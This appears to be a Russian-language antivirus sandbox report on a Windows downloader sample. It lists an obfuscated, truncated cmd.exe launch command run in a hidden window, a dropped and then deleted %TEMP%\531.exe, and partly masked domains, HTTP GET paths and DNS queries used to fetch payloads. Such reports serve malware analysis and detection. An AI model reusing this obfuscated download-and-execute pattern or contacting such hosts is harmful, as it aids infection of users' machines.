Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cMD.ExE /v:/C " Set }`$,=-\/\__-//-/-\__ -\\_-/-\_-_///_ _/_/-\\_\/\--/- -_/\-\_\_-_\/-/ \-_/--\/_\-\//_ /_-_-_\/\_\-\// \\\-/\_-_-/-/_/ __/-\_//\/_\-\- //_\-/_--_/\\-\ /-...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\531.exe
Удаляет следующие файлы
- %TEMP%\531.exe
Сетевая активность
Подключается к
- 'fa##usa.com':80
- 'pr##an.com':80
- 'aa###chai.com':443
- 'lu#####moraes.com.br':80
- 'lc#####namento.com.br':80
TCP
Запросы HTTP GET
- http://fa##usa.com/Qmb
- http://pr##an.com/YNH
- http://lu#####moraes.com.br/BtDELY
- http://lc#####namento.com.br/RMd
Другие
- 'aa###chai.com':443
UDP
- DNS ASK mi###ictor.me
- DNS ASK fa##usa.com
- DNS ASK pr##an.com
- DNS ASK aa###chai.com
- DNS ASK lu#####moraes.com.br
- DNS ASK lc#####namento.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c cMD.ExE /v:/C " Set }`$,=-\/\__-//-/-\__ -\\_-/-\_-_///_ _/_/-\\_\/\--/- -_/\-\_\_-_\/-/ \-_/--\/_\-\//_ /_-_-_\/\_\-\// \\\-/\_-_-/-/_/ __/-\_//\/_\-\- //_\-/_--_/\\-\ /-...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v:/C " Set }`$,=-\/\__-//-/-\__ -\\_-/-\_-_///_ _/_/-\\_\/\--/- -_/\-\_\_-_\/-/ \-_/--\/_\-\//_ /_-_-_\/\_\-\// \\\-/\_-_-/-/_/ __/-\_//\/_\-\- //_\-/_--_/\\-\ /-\\-_-_\_/\-// -/_\-/\__-\-...
